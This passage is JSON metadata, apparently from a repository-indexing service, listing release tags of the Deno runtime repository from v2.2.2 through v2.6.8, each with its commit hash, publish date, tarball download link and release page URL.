62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z